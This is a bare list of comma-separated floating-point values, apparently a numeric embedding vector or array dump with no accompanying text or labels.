-0.009727508760988712, -0.007490470539778471, -0.0025780063588172197, 0.05005192756652832, -0.009965645149350166, 0.01951274648308754, 0.014280963689088821, 0.013378932140767574, 0.06090517342090607, -0.014605695381760597, 0.00926566869020462, -0.005080241709947586, -0.008479096926748753, 0.02327963151037693, 0.03977598622441292, -0.02955777198076248, -0.022428113967180252, 0.016597380861639977, 0.0003923837502952665, -0.02238481678068638, -0.003633383195847273, -0.042229510843753815, 0.025487804785370827, -0.006339477840811014, -0.0008091223426163197, -0.01889215037226677, -0.005192094016820192, 0.01740560121834278, -0.013198526576161385, -0.010593459010124207, 0.009994509629905224, 0.057123854756355286, -0.025054829195141792, -0.026613539084792137, -0.05028284713625908, 0.0018599891336634755, -0.0327906534075737, 0.002884696936234832, -0.011437760666012764, -0.02916809357702732, -0.03758224472403526, -0.033483412116765976, 0.003216644749045372, -0.006148247513920069, 0.04517374187707901, 0.01801176741719246, -0.007844066247344017, 0.024362068623304367, -0.02840317040681839, -0.05885575711727142, -0.05178382992744446, 0.004207075107842684, -0.02602180652320385, 0.024304339662194252, 0.03651423752307892, 0.014750020578503609, -0.0027710411231964827, -0.0003308200975880027, -0.002588830655440688, 0.004708604887127876, -0.02776814065873623, 0.023698173463344574, 0.014396424405276775, 0.005242607556283474, 0.02515585720539093, 0.019931290298700333, 0.035330772399902344, 0.0505714975297451, 0.009193506091833115, -0.02128794603049755, -0.01703035645186901, 0.012534631416201591, -0.018242686986923218, -0.03192470222711563, 0.00650906004011631, 0.022673465311527252, 0.016092242673039436, 0.02527131699025631, 0.002810730366036296, -0.014432505704462528, -0.04006463661789894, 0.0008424975094385445, -0.025863049551844597, -0.0009444270981475711, -0.020681779831647873, 0.01838701218366623, 0.018069496378302574, -0.03599466755986214, 0.003478233702480793, -0.023380659520626068, -0.034724608063697815, 0.001094164326786995, 0.006678641773760319, -0.00839250162243843, 0.004737469833344221, -0.010809946805238724, 0.026873325929045677, 0.034724608063697815, 0.029009336605668068, -0.010708918794989586, 0.002826967043802142, 0.030827831476926804, -0.007627578917890787, -0.005870421417057514, -0.034609146416187286, -0.016683977097272873, 0.03016393631696701, 0.0360523983836174, -0.07510675489902496, -0.016063379123806953, 0.007277590688318014, -0.042229510843753815, -0.02825884521007538, -0.026959920302033424, -0.009106910787522793, -0.024232177063822746, -0.032963842153549194, -0.02166319079697132, -0.04289340600371361, 0.011286219581961632, -0.007642011623829603, 0.016813868656754494, 0.013992314226925373, -0.03466687723994255, -0.019065339118242264, 0.005841556470841169, 0.04378822073340416, -0.016698408871889114, 0.00021738960640504956, -0.011560437269508839, -0.010766648687422276, 0.00738944299519062, 0.001207820256240666, -0.036081261932849884, 0.0029099539387971163, -0.004520982503890991, 0.030481452122330666, -0.02651251293718815, -0.004899835679680109, -0.004950349219143391, 0.021114755421876907, 0.006187936756759882, 0.0015298455255106091, -0.01664067804813385, 0.016467489302158356, -0.0383327342569828, 0.05830732360482216, -0.0247950442135334, 0.022861087694764137, 0.004751902539283037, 0.035099852830171585, -0.011538787744939327, -0.01432426180690527, -0.0029640758875757456, -0.01877668872475624, -0.0006327751325443387, 0.021316811442375183, 0.0016904071671888232, 0.0027133109979331493, 0.0355616919696331, 0.012166602537035942, 0.026945488527417183, 0.01939728669822216, -0.0005953408544883132, 0.032328810542821884, 0.017679819837212563, -0.00807498674839735, 0.010247078724205494, 0.0031408739741891623, -0.02091270126402378, 0.010781081393361092, -0.040872856974601746, 0.019974587485194206, 0.00600031390786171, -0.003010981483384967, 0.016323164105415344, -0.0031408739741891623, -0.01489434577524662, 0.005152404308319092, 0.004023060668259859, -0.013097498565912247, -0.028720686212182045, -0.019325124099850655, 0.02174978516995907, -0.006620911881327629, -0.034840069711208344, -0.02463628724217415, -0.002350694267079234, -0.029846420511603355, 0.00801725685596466, -0.003057887079194188, -0.02703208290040493, -0.005321986507624388, -0.005080241709947586, 0.04101718217134476, 0.008428582921624184, -0.01270782109349966, 0.021966272965073586, -0.01564483530819416, -0.019310692325234413, 0.008414150215685368, 0.046501532196998596, -0.0009534473647363484, -0.01062954030930996, 0.027450624853372574, -0.024116717278957367, -0.016554083675146103, -0.03016393631696701, 0.010968703776597977, 0.010239862836897373, 0.007162130903452635, -0.04557785391807556, 0.025343479588627815, 0.006566789932549, 0.0318092405796051, 0.02639705315232277, -0.012801632285118103, 0.017420034855604172, 0.010961487889289856, 0.034984394907951355, -0.009814104065299034, 0.0036351874005049467, 0.014288180507719517, 0.007728606462478638, -0.041479021310806274, 0.04381708800792694, -0.02540121041238308, -0.010109970346093178, 0.042229510843753815, -0.0023326536174863577, -0.009763590060174465, -0.01119962427765131, -0.02540121041238308, -0.03738018870353699, 0.039978038519620895, -0.0025527493562549353, -0.05706612765789032, -0.0304237212985754, 0.006552357692271471, 0.024318771436810493, -0.020436428487300873, -0.030250530689954758, -0.009676994755864143, -0.019339557737112045, -0.006671425420790911, -0.009085262194275856, 0.029846420511603355, -0.016467489302158356, 0.019108636304736137, -0.009114127606153488, -0.016958193853497505, 0.013422230258584023, 0.032588597387075424, -0.028100088238716125, -0.023063143715262413, 0.009799671359360218, 0.04018009454011917, -0.009164640679955482, -0.007771904114633799, 0.027739275246858597, 0.04566444829106331, -0.008839909918606281, 0.00957596767693758, -0.004690564237535, -0.020465292036533356, 0.0067652370780706406, -0.02125908061861992, 0.01163259893655777, 0.00951823778450489, -0.010319241322577, 0.022485842928290367, -0.007562632672488689, 0.010651188902556896, 0.01495207566767931, -0.00729202339425683, 0.05510330572724342, 0.010081104934215546, -0.012931524775922298, -0.011906816624104977, -0.011271786876022816, -0.01866122893989086, 0.010225430130958557, -0.008601773530244827, 0.007263158448040485, 0.002161267679184675, -0.020696213468909264, 0.01627986691892147, -0.0020909092854708433, 0.02765268087387085, 0.018170524388551712, -0.01114189438521862, 0.014793317764997482, -0.014980941079556942, 0.03642764315009117, -0.017982902005314827, -0.0028504198417067528, 0.022572439163923264, -0.037611108273267746, -0.017737548798322678, 0.004116872325539589, 0.032588597387075424, 0.0013241823762655258, -0.002554553560912609, -0.005621460732072592, -0.000057419947552261874, 0.009409993886947632, -0.02115805260837078, -0.009741941466927528, -0.022615736350417137, -0.0050369445234537125, 0.00681935902684927, 0.01975809969007969, -0.003337516915053129, -0.0035016867332160473, 0.020725077018141747, 0.002695270348340273, 0.022947683930397034, -0.00289371726103127, 0.008406934328377247, 0.01082437951117754, -0.007403875235468149, -0.02166319079697132, 0.021085890009999275, 0.002592438831925392, -0.012585144490003586, -0.020234372466802597, -0.034464821219444275, 0.005433838348835707, 0.004394697956740856, 0.03625445440411568, 0.016438623890280724, -0.00113385368604213, 0.0067652370780706406, -0.03027939610183239, -0.014418072998523712, 0.0015154130524024367, 0.016698408871889114, -0.03270405903458595, 0.010752216912806034, -0.02304871194064617, -0.016741706058382988, 0.020090047270059586, 0.01270782109349966, -0.00775747187435627, 0.0059317597188055515, 0.0018085733754560351, -0.0022604912519454956, 0.002987528685480356, -0.013552122749388218, 0.0352441780269146, -0.018978744745254517, -0.028374304994940758, -0.011582085862755775, 0.010687270201742649, 0.02651251293718815, 0.01814165897667408, 0.005271472502499819, 0.008233744651079178, -0.003983371425420046, 0.008803828619420528, -0.008486312814056873, 0.008847125805914402, -0.00863785482943058, 0.009200721979141235, -0.04280681163072586, 0.001367479912005365, -0.007613146677613258, -0.019224097952246666, -0.012181034311652184, -0.005188485607504845, -0.007061103358864784, 0.015139698050916195, -0.006851831916719675, -0.011048083193600178, -0.009301749989390373, -0.0458376370370388, -0.01565926894545555, 0.004831281024962664, -0.003727194620296359, -0.020955998450517654, 0.007385834585875273, -0.0005975959356874228, 0.007779120467603207, -0.03905436024069786, 0.013378932140767574, -0.051870424300432205, -0.001169032882899046, 0.03114534728229046, 0.00850074551999569, 0.020061181858181953, -0.008334771730005741, -0.01250576600432396, 0.008529610931873322, -0.02300541289150715, -0.00034547809627838433, 0.024982666596770287, -0.04153675213456154, -0.005372500047087669, -0.012310926802456379, -0.00195380044169724, 0.00219013262540102, -0.020479725673794746, -0.015832457691431046, -0.021057024598121643, 0.02252914011478424, -0.020710645243525505, -0.018560202792286873, -0.016582949087023735, -0.04170994088053703, -0.023452822118997574, 0.01788187399506569, -0.006916778162121773, 0.02040756307542324, -0.011185191571712494, 0.013559338636696339, 0.018199389800429344, -0.028561927378177643, 0.004156561568379402, -0.0006589340628124774, 0.019195232540369034, -0.025458939373493195, -0.01000894233584404, 0.055882662534713745, -0.0322999469935894, 0.007620363030582666, -0.0024066201876848936, -0.02300541289150715, 0.04921484366059303, -0.04615515097975731, -0.018949879333376884, -0.006776061374694109, 0.021793082356452942, 0.017217978835105896, 0.007829634472727776, 0.0030795359052717686, -0.018242686986923218, -0.005837948527187109, -0.0017797083128243685, 0.008399718441069126, 0.007844066247344017, -0.01293874066323042, -0.03362773731350899, 0.04381708800792694, -0.02301984652876854, 0.025617696344852448, 0.011856303550302982, -0.035590559244155884, 0.0161499734967947, -0.037842027842998505, -0.017333438619971275, 0.003012785455211997, 0.017694251611828804, 0.01987355947494507, 0.029586635529994965, 0.036600835621356964, 0.007230685092508793, 0.010983136482536793, 0.0005506902816705406, 0.005928151775151491, -0.0011933877831324935, -0.0065271006897091866, 0.008305907249450684, -0.010232646018266678, 0.011834654025733471, -0.015702566131949425, -0.004697780590504408, -0.02029210329055786, 0.01319130975753069, -0.029961882159113884, -0.0036099303979426622, -0.03443595767021179, -0.02815781719982624, -0.006476586684584618, -0.008204879239201546, -0.015197427943348885, 0.01250576600432396, -0.004910659976303577, -0.005603420082479715, -0.0015352577902376652, -0.00839250162243843, -0.014923210255801678, 0.004744686186313629, -0.008601773530244827, -0.004235940519720316, 0.02029210329055786, -0.010340889915823936, 0.005928151775151491, 0.03657196834683418, -0.006545141339302063, -0.012087223120033741, -0.028879443183541298, -0.04791591688990593, 0.001328692538663745, 0.004842105787247419, -0.0012042121961712837, -0.03818840906023979, -0.02189411036670208, 0.000626911933068186, -0.0005628677317872643, 0.009222370572388172, -0.03657196834683418, 0.006317829247564077, -0.06384940445423126, -0.009179073385894299, 0.01239030621945858, 0.0013052397407591343, -0.008176014758646488, -0.02717640809714794, -0.001761667663231492, 0.0142737478017807, 0.009525453671813011, -0.012527414597570896, 0.021186918020248413, 0.018921013921499252, -0.006296180654317141, -0.015818025916814804, -0.0019141110824421048, -0.03391638770699501, -0.009121343493461609, -0.032213352620601654, 0.025487804785370827, -0.010218214243650436, 0.028056791052222252, -0.014151071198284626, 0.009871833957731724, -0.007642011623829603, 0.031953565776348114, 0.008262609131634235, -0.0014179936842992902, 0.0002303563232999295, 0.004383873660117388, 0.01208000723272562, -0.018300417810678482, 0.018574634566903114, -0.009482156485319138, 0.00744717288762331, 0.005845164880156517, 0.027508355677127838, -0.007075535599142313, -0.02264460176229477, 0.01837257854640484, -0.0075770653784275055, -0.03544623404741287, -0.0012249589199200273, 0.034984394907951355, 0.011293435469269753, -0.01838701218366623, 0.005376108456403017, 0.026252727955579758, -0.008118283934891224, 0.008334771730005741, -0.018112793564796448, -0.030452586710453033, 0.0007148600416257977, 0.005675582680851221, -0.011668680235743523, -0.016698408871889114, -0.043470706790685654, 0.028359873220324516, -0.020826105028390884, 0.010427485220134258, -0.004109655972570181, 0.009056396782398224, 0.014483018778264523, 0.013732529245316982, -0.019310692325234413, -0.01877668872475624, -0.010304808616638184, 0.015341753140091896, -0.01306863408535719, 0.005087458062916994, -0.01889215037226677, -0.010687270201742649, -0.007425523828715086, -0.02978869155049324, -0.00390760088339448, 0.02579088695347309, -0.0040411013178527355, 0.03154945746064186, -0.0006377363461069763, -0.030625777319073677, -0.021374540403485298, -0.012614009901881218, -0.008334771730005741, -0.03677402436733246, 0.013783042319118977, -0.008724449202418327, -0.006970900110900402, -0.01600564830005169, -0.030192801728844643, 0.020811673253774643, 0.004723037593066692, -0.021951841190457344, 0.02651251293718815, 0.00014996275422163308, 0.020638482645154, -0.04318205639719963, 0.023712607100605965, -0.02066734805703163, 0.034464821219444275, -0.018964312970638275, 0.004611185286194086, -0.01139446347951889, -0.0445387102663517, 0.0026844460517168045, -0.013342850841581821, -0.004077182617038488, 0.01214495301246643, -0.0066245198249816895, 0.00646937033161521, 0.028966037556529045, -0.03481120243668556, 0.0322999469935894, -0.0013025336666032672, -0.0013566554989665747, 0.032588597387075424, 0.007053887005895376, -0.030683506280183792, 0.02538677677512169, -0.00969142746180296, 0.0031065968796610832, 0.012895443476736546, 0.020494157448410988, -0.016929328441619873, -0.03414730727672577, 0.008313123136758804, -0.024838341400027275, 0.011719194240868092, 0.01887771673500538, -0.0012051141820847988, 0.009222370572388172, 0.015009805560112, 0.04728088900446892, 0.005040552467107773, 0.003990587778389454, -0.0033880306873470545, 0.01812722720205784, -0.019801396876573563, -0.015818025916814804, 0.023626010864973068, -0.005668366327881813, -0.003719978267326951, -0.014923210255801678, 0.010355322621762753, -0.0037055457942187786, -0.04295113682746887, -0.03382979333400726, -0.008161582052707672, -0.00031728961039334536, -0.0005091968341730535, 0.03027939610183239, 0.013061417266726494, -0.001839242409914732, 0.005495176650583744, -0.003678484819829464, 0.0380152203142643, -0.015009805560112, -0.005827124230563641, -0.024578556418418884, 0.00390760088339448, -0.012924308888614178, 0.011380030773580074, -0.006422464735805988, -0.009049180895090103, -0.010109970346093178, 0.0034277199301868677, -0.004751902539283037, -0.026555810123682022, -0.01432426180690527, -0.009417209774255753, 0.03027939610183239, -0.010622324422001839, 0.011466625146567822, 0.010896541178226471, 0.009965645149350166, -0.0026772296987473965, -0.00819044653326273, 0.007375010289251804, -0.011603734456002712, 0.015673700720071793, -0.015543808229267597, -0.007916228845715523, -0.0011113028740510345, 0.009734724648296833, -0.003950898535549641, 0.030972156673669815, 0.00351792317815125, -0.03893889859318733, -0.0012258609058335423, -0.00179865094833076, -0.010081104934215546, -0.014555181376636028, -0.015500511042773724, -0.012231548316776752, -0.03989144414663315, -0.008277041837573051, -0.012411954812705517, -0.013985097408294678, 0.014244883321225643, 0.01879112236201763, 0.0778200700879097, 0.04430779069662094, 0.0013602636754512787, -0.014194369316101074, -0.013436662964522839, -0.015471645630896091, 0.004394697956740856, 0.018819987773895264, -0.004733861889690161, -0.016683977097272873, 0.01887771673500538, -0.012678955681622028, 0.009193506091833115, -0.005145187955349684, 0.004665307234972715, 0.013198526576161385, -0.0028810889925807714, -0.006224018055945635, 0.008363637141883373, 0.009590399451553822, 0.010131618939340115, 0.012433603405952454, 0.027739275246858597, -0.0023741470649838448, -0.0012204487575218081, -0.02252914011478424, 0.0014820379437878728, 0.006779669318348169, -0.014851047657430172, 0.005776610225439072, 0.010355322621762753, -0.015962351113557816, -0.01939728669822216, 0.004347792360931635, -0.0032310772221535444, -0.007028630003333092, 0.0021287945564836264, -0.017174681648612022, -0.012166602537035942, -0.018560202792286873, 0.006122990511357784, 0.0077646877616643906, -0.00021975745039526373, 0.008731666021049023, -0.006122990511357784, -0.02929798513650894, 0.012375873513519764, 0.000003562319989214302, -0.014656209386885166, -0.018083930015563965, -0.015024238266050816, -0.020450860261917114, -0.0075842817313969135, 0.06690909713506699, -0.011250138282775879, -0.005116323009133339, 0.001296219415962696, -0.0006021060980856419, -0.02463628724217415, -0.019426152110099792, 0.0016723665175959468, 0.008652286604046822, 0.00572609668597579, 0.019483882933855057, 0.011625383049249649, -0.00018412720237392932, -0.012087223120033741, -0.003932857885956764, -0.001794140785932541, 0.01200062781572342, 0.01094705518335104, 0.00047942978562787175, 0.01664067804813385, -0.005592595785856247, 0.01639532670378685, 0.03758224472403526, -0.00938112847507, 0.0016489137196913362, -0.027594950050115585, -0.023351794108748436, 0.0161499734967947, 0.02329406328499317, -0.01163259893655777, 0.020955998450517654, -0.01627986691892147, -0.0006106753717176616, 0.016323164105415344, -0.00019382403115741909, -0.0012150364927947521, -0.02314973808825016, -0.006166288163512945, -0.01789630763232708, 0.010384188033640385, -0.0077646877616643906, -0.005855989176779985, 0.001959212590008974, -0.006711115129292011, -0.01815609261393547, -0.00001758961661835201, -0.0058632055297493935, -0.0016344812465831637, 0.0021955447737127542, 0.04349957033991814, -0.001021099742501974, -0.02151886560022831, -0.0033754021860659122, 0.0075914980843663216, 0.007945094257593155, -0.004001412075012922, 0.013602636754512787, -0.03432049974799156, -0.00625288300216198, -0.017059221863746643, -0.027566084638237953, 0.012606793083250523, -0.019238529726862907, -0.019180798903107643, 0.009749157354235649, 0.00531837809830904, -0.029471175745129585, -0.01727570965886116, -0.019613774493336678, 0.030019611120224, -0.00801004096865654, 0.010802729986608028, -0.007923445664346218, -0.0161499734967947, -0.006707506719976664, 0.04442325234413147, 0.03238654136657715, 0.03755337744951248, 0.018488040193915367, 0.006014746613800526, -0.014656209386885166, 0.021677622571587563, -0.011473841965198517, 0.01625100150704384, -0.010362538509070873, -0.004813240375369787, -0.005487960297614336, -0.002987528685480356, 0.03564829006791115, -0.0000860312648001127, 0.01763652078807354, 0.020104480907320976, -0.013783042319118977, -0.007981175556778908, 0.017362304031848907, 0.013234607875347137, 0.017073653638362885, -0.0012222528457641602, -0.007750255521386862, 0.01131508406251669, 0.04508714750409126, -0.014663425274193287, -0.003839046461507678, 0.0011861715465784073, -0.034955527633428574, -0.01677057147026062, 0.017333438619971275, 0.0012033100938424468, 0.018834419548511505, 0.019801396876573563, 0.006209585350006819, 0.00666781747713685, 0.012036709114909172, 0.005718880333006382, -0.05290956422686577, -0.024621853604912758, -0.0210425928235054, 0.010239862836897373, 0.002464350312948227, -0.014353126287460327, -0.018617931753396988, 0.02678672969341278, 0.007140481844544411, -0.03639877960085869, -0.010131618939340115, -0.013472744263708591, 0.006747196428477764, -0.004520982503890991, 0.03501325845718384, -0.017492197453975677, -0.005560122895985842, 0.030596911907196045, -0.015154130756855011, 0.02967323176562786, -0.014569614082574844, -0.02641148492693901, 0.008168797940015793, 0.010925406590104103, 0.0342627689242363, -0.014317044988274574, -0.02189411036670208, -0.03388752415776253, -0.020941564813256264, 0.01977253332734108, 0.015716997906565666, 0.003947290126234293, 0.0010057651670649648, 0.015615970827639103, 0.0005867715226486325, -0.008666719309985638, -0.012339792214334011, -0.006804926320910454, -0.022428113967180252, 0.011235705576837063, 0.011647031642496586, -0.027364030480384827, -0.004975606221705675, -0.005610636435449123, -0.0034674094058573246, 0.006047219969332218, 0.00046815440873615444, -0.011733626946806908, 0.008479096926748753, 0.0039220331236720085, -0.03518644720315933, -0.020118912681937218, 0.0021251863799989223, -0.025733157992362976, 0.00024693115847185254, 0.007504902780056, -0.0064008161425590515, -0.01602008193731308, -0.011055299080908298, 0.03079896606504917, -0.006361126899719238, -0.007793552707880735, 0.013249039649963379, 0.01577472873032093, 0.005711663980036974, 0.02225492335855961, -0.008558475412428379, 0.008854341693222523, 0.03564829006791115, -0.008572908118367195, -0.009561534970998764, 0.008277041837573051, -0.04341297596693039, -0.02491050399839878, -0.014317044988274574, -0.02527131699025631, 0.01014605164527893, -0.01314079575240612, -0.00019134345347993076, 0.016048945486545563, 0.029081499204039574, -0.003119225148111582, 0.02450639382004738, -0.027436193078756332, 0.014317044988274574, 0.002071064431220293, -0.018430309370160103, -0.002354302443563938, 0.012563495896756649, 0.001527139451354742, -0.006133814807981253, 0.042864542454481125, -0.012274845503270626, 0.012628442607820034, -0.015486078336834908, -0.009474939666688442, 0.012347008101642132, -0.03166491538286209, 0.017853008583188057, -0.00900588370859623, 0.004106047563254833, -0.007497686427086592, 0.0019141110824421048, -0.010838811285793781, 0.02551667019724846, 0.013169661164283752, -0.000568730931263417, -0.027104245498776436, 0.003056083107367158, -0.014035611413419247, -0.028489766642451286, -0.011177975684404373, -0.003090360201895237, 0.0005984979798085988, 0.03501325845718384, 0.005350851453840733, -0.028951605781912804, -0.010809946805238724, 0.022312654182314873, -0.023106440901756287, -0.02426104247570038, -0.005520433187484741, -0.031058751046657562, 0.0006544239004142582, 0.010369755327701569, -0.019310692325234413, 0.002904541790485382, 0.007909012958407402, -0.011098596267402172, -0.01000172644853592, 0.01988799311220646, -0.0031120090279728174, 0.011401679366827011, 0.007230685092508793, 0.016828300431370735, 0.01799733377993107, 0.026988785713911057, -0.008168797940015793, 0.02489607222378254, 0.009135776199400425, -0.01452631689608097, -0.014937642961740494, 0.03492666408419609, 0.011668680235743523, -0.029095930978655815, -0.006855439860373735, -0.020566320046782494, 0.00447768485173583, -0.013321202248334885, 0.016611814498901367, 0.012159385718405247, 0.016207704320549965, -0.01703035645186901, 0.027724843472242355, 0.004582320339977741, -0.010030590929090977, -0.04526033625006676, -0.013530474156141281, 0.01293874066323042, -0.006137422751635313, 0.007512119133025408, 0.02491050399839878, -0.009352263063192368, 0.019483882933855057, 0.016337595880031586, 0.010550161823630333, 0.00781520176678896, 0.001645305659621954, 0.003213036572560668, 0.001253823866136372, -0.011906816624104977, -0.005704447627067566, -0.017102519050240517, -0.006307004950940609, 0.02364044450223446, -0.013003687374293804, -0.01703035645186901, 0.0038282221648842096, -0.014468587003648281, 0.019440583884716034, 0.00788014754652977, -0.003640599548816681, -0.01477888599038124, -0.02040756307542324, -0.011553220450878143, -0.00713687390089035, 0.003442152636125684, 0.027926897630095482, 0.028951605781912804, 0.009142992086708546, -0.005960624665021896, 0.006433289498090744, -0.005509608890861273, -0.014288180507719517, 0.005278688855469227, 0.01469950657337904, 0.0006314220954664052, -0.011784140951931477, 0.0322999469935894, -0.0047482941299676895, -0.0045173740945756435, 0.013804691843688488, -0.019916856661438942, -0.0008068672614172101, 0.019613774493336678, -0.023351794108748436, 0.02326519787311554, -0.008998666889965534, 0.007425523828715086, 0.015009805560112, -0.004643658641725779, -0.0314917266368866, 0.007562632672488689, 0.0061626797541975975, -0.00438026525080204, -0.004499333444982767, 0.007512119133025408, -0.014244883321225643, -0.009294533170759678, -0.011625383049249649, 0.00004907615584670566, 0.00918628927320242, 0.00666420953348279, 0.027060948312282562, 0.031087616458535194, -0.01371087972074747, 0.05767229199409485, 0.01171197835355997, 0.000801455054897815, 0.006898737512528896, 0.012664523907005787, -0.009503805078566074, 0.0033808143343776464, 0.019123069941997528, 0.010910973884165287, -0.009056396782398224, 0.0068770889192819595, 0.016741706058382988, -0.002776453271508217, -0.011870735324919224, -0.02213946357369423, 0.024852775037288666, -0.005621460732072592, 0.011033650487661362, -0.015471645630896091, 0.018863284960389137, -0.022846655920147896, 0.0000016173144103959203, -0.021230215206742287, -0.006887913215905428, -0.01649635285139084, -0.010059456340968609, -0.021619893610477448, -0.017044788226485252, 0.016987059265375137, -0.01690046302974224, -0.030712371692061424, 0.011358382180333138, -0.001725586480461061, 0.02166319079697132, -0.025805320590734482, 0.024564124643802643, 0.027234137058258057, 0.023092009127140045, 0.022861087694764137, 0.009734724648296833, 0.010167700238525867, 0.004614793695509434, -0.005130755715072155, -0.009741941466927528, -0.011639815755188465, -0.009597616270184517, -0.003209428396075964, -0.0005285905208438635, -0.0035359638277441263, 0.0004974704352207482, -0.0012303710682317615, 0.011726411059498787, -0.02053745463490486, 0.00738944299519062, 0.0010328261414542794, -0.01332841906696558, 0.0030741237569600344, 0.02088383585214615, 0.0009823123691603541, 0.005664758384227753, 0.0008262609480880201, -0.00033713431912474334, -0.010037807747721672, 0.020436428487300873, -0.00030962235177867115, 0.02252914011478424, -0.0042106835171580315, 0.015731431543827057, -0.019801396876573563, 0.01763652078807354, -0.01677057147026062, 0.006566789932549, 0.011870735324919224, 0.0006796807865612209, -0.005888462066650391, -0.011841870844364166, -0.02101372741162777, 0.0229188185185194, -0.005397757049649954, -0.007923445664346218, -0.012642874382436275, 0.008926504291594028, 0.00801004096865654, -0.004246764816343784, -0.02592078037559986, -0.0073533616960048676, 0.019931290298700333, 0.008240960538387299, 0.00703945429995656, -0.009467723779380322, -0.023972392082214355, 0.0019790572114288807, 0.047482941299676895, 0.018733391538262367, 0.00824817642569542, -0.005080241709947586, 0.009619264863431454, -0.013458311557769775, 0.008212095126509666, -0.01345109473913908, 0.01270782109349966, 0.012751118279993534, -0.0010743195889517665, 0.005137972068041563, 0.007057494949549437, 0.0043983059003949165, -0.005722488276660442, -0.005174053367227316, 0.006086909212172031, 0.009460506960749626, -0.0004916072357445955, 0.02576202154159546, -0.02691662311553955, 0.005008079577237368, -0.0013431250117719173, 0.020927133038640022, -0.009294533170759678, 0.0033032395876944065, -0.003936465829610825, 0.01678500324487686, 0.03357000648975372, 0.00412408821284771, -0.0022208017762750387, 0.0010662013664841652, 0.008024472743272781, -0.021114755421876907, -0.008890422992408276, 0.016236567869782448, -0.006422464735805988, -0.002002510242164135, -0.010247078724205494, -0.009785238653421402, -0.00546991964802146, 0.008587340824306011, 0.0031787592452019453, -0.001331398612819612, -0.00824817642569542, 0.006891521159559488, -0.012577928602695465, -0.004239548463374376, -0.008991451002657413, -0.010802729986608028, -0.009778022766113281, 0.024347636848688126, 0.0003955408465117216, 0.01108416449278593, 0.0006873480742797256, 0.0059173270128667355, -0.0425758920609951, -0.006718331482261419, 0.008284257724881172, -0.0039220331236720085, -0.017304573208093643, 0.01483661588281393, -0.017694251611828804, -0.007396658882498741, 0.00531477015465498, -0.015053102746605873, 0.010643973015248775, -0.02016220986843109, -0.008356420323252678, -0.01850247196853161, 0.00013158385991118848, 0.005076633766293526, -0.002029570983722806, -0.0044560362584888935, 0.00931618269532919, -0.0065126679837703705, -0.0006706604617647827, 0.0027926897164434195, 0.019368423148989677, 0.006559573579579592, -0.00023768532264512032, 0.003940073773264885, 0.013905718922615051, -0.0030723195523023605, -0.01677057147026062, 0.008659503422677517, 0.006083301268517971, -0.006462154444307089, 0.0018834419315680861, -0.012462468817830086, 0.013869637623429298, -0.003954506479203701, 0.009669778868556023, 0.017838576808571815, 0.002464350312948227, 0.0031462861225008965, 0.02579088695347309, -0.0028450076933950186, -0.003600910073146224, -0.0008542239083908498, 0.0014062672853469849, 0.02527131699025631, -0.00850074551999569, -0.017203547060489655, -0.02802792564034462, 0.005116323009133339, -0.006884305272251368, -0.0037416270934045315, -0.0020205506589263678, -0.007356969639658928, 0.010600674897432327, -0.027320733293890953, -0.0026718175504356623, 0.0006012040539644659, 0.027205273509025574, -0.008443015627563, 0.014302613213658333, -0.010391403920948505, 0.009345047175884247, -0.0028413995169103146, 0.0041601695120334625, 0.018329281359910965, 0.012635658495128155, -0.009179073385894299, -0.015284023247659206, 0.0011969959596171975, -0.0352441780269146, 0.008291474543511868, 0.01083159539848566, -0.004463252145797014, 0.017174681648612022, 0.018935447558760643, 0.004802416078746319, -0.008053338155150414, -0.017593223601579666, 0.023250766098499298, 0.0068770889192819595, -0.00839250162243843, -0.009590399451553822, 0.0018942663446068764, 0.004181818570941687, 0.013176877051591873, 0.005340027157217264, 0.0052173505537211895, -0.00824817642569542, 0.0037308025639504194, 0.020725077018141747, 0.009821319952607155, 0.015182996168732643, 0.02377033606171608, 0.02867738902568817, -0.010680054314434528, -0.0015875756507739425, 0.009200721979141235, 0.005769393872469664, -0.002305592643097043, -0.008673936128616333, 0.013263472355902195, 0.00969864334911108, -0.007656444329768419, 0.010773865506052971, 0.0017526473384350538, -0.016077810898423195, 0.013205742463469505, -0.013855204917490482, 0.016424190253019333, 0.01420880202203989, 0.01612110808491707, -0.009489372372627258, 0.004885402973741293, -0.03599466755986214, -0.03079896606504917, 0.003418699838221073, -0.010809946805238724, 0.019108636304736137, 0.007295631337910891, 0.007540984079241753, 0.01006667222827673, 0.015399483032524586, 0.020436428487300873, 0.010788298211991787, 0.002706094877794385, -0.002278531901538372, 0.024116717278957367, 0.0023561064153909683, -0.004387481603771448, 0.030192801728844643, -0.018921013921499252, 0.0075265513733029366, 0.018444741144776344, -0.005527649540454149, 0.01750662922859192, -0.010983136482536793, -0.018819987773895264, 0.004149345215409994, -0.00045755552127957344, -0.013523257337510586, -0.006238450296223164, 0.005094674415886402, -0.005675582680851221, 0.006736372131854296, 0.0071007926017045975, -0.013357283547520638, -0.01563040353357792, -0.017809711396694183, 0.0008366343099623919, 0.003016393631696701, 0.011127461679279804, -0.01363871805369854, 0.002231626072898507, -0.03117421083152294, -0.0018365363357588649, 0.012772766873240471, -0.010672837495803833, -0.004831281024962664, -0.012592361308634281, -0.006754412315785885, 0.0014703115448355675, -0.005137972068041563, -0.00766366021707654, 0.0015767512377351522, -0.0030290221329778433, -0.008457448333501816, -0.010687270201742649, 0.003247313667088747, 0.011928466148674488, 0.00969864334911108, 0.014201585203409195, -0.014114989899098873, 0.016164405271410942, 0.008507962338626385, 0.0017454311018809676, -0.011214056983590126, 0.0051127150654792786, -0.01576029509305954, -0.0014252099208533764, 0.02053745463490486, -0.005653934087604284, -0.017809711396694183, -0.0058632055297493935, -0.004178210161626339, -0.025199154391884804, -0.008890422992408276, -0.004466860555112362, 0.019974587485194206, 0.032097890973091125, 0.002617695601657033, 0.030712371692061424, -0.013573771342635155, -0.00002660993231984321, -0.0012402933789417148, -0.00819044653326273, -0.01941172033548355, 0.0009886266198009253, -0.019224097952246666, 0.015428348444402218, 0.00018277415074408054, -0.0024499178398400545, -0.006184328347444534, -0.028331007808446884, -0.0032779828179627657, 0.012282062321901321, 0.009272884577512741, -0.010023375041782856, 0.017492197453975677, 0.002702486701309681, 0.0077646877616643906, 0.003478233702480793, 0.013840773142874241, -0.002707898849621415, 0.010788298211991787, -0.017925171181559563, -0.015125265344977379, -0.0038173976354300976, -0.009792454540729523, -0.006357518490403891, 0.013790259137749672, 0.005170444957911968, 0.006480195093899965, 0.023193037137389183, 0.014605695381760597, 0.004243156407028437, -0.025343479588627815, -0.017824145033955574, -0.015240726061165333, 0.005065809469670057, 0.0030290221329778433, 0.003867911407724023, 0.006480195093899965, 0.0051596206612885, 0.0008659503073431551, 0.010463566519320011, -0.01789630763232708, -0.014288180507719517, 0.00015142855409067124, 0.009785238653421402, 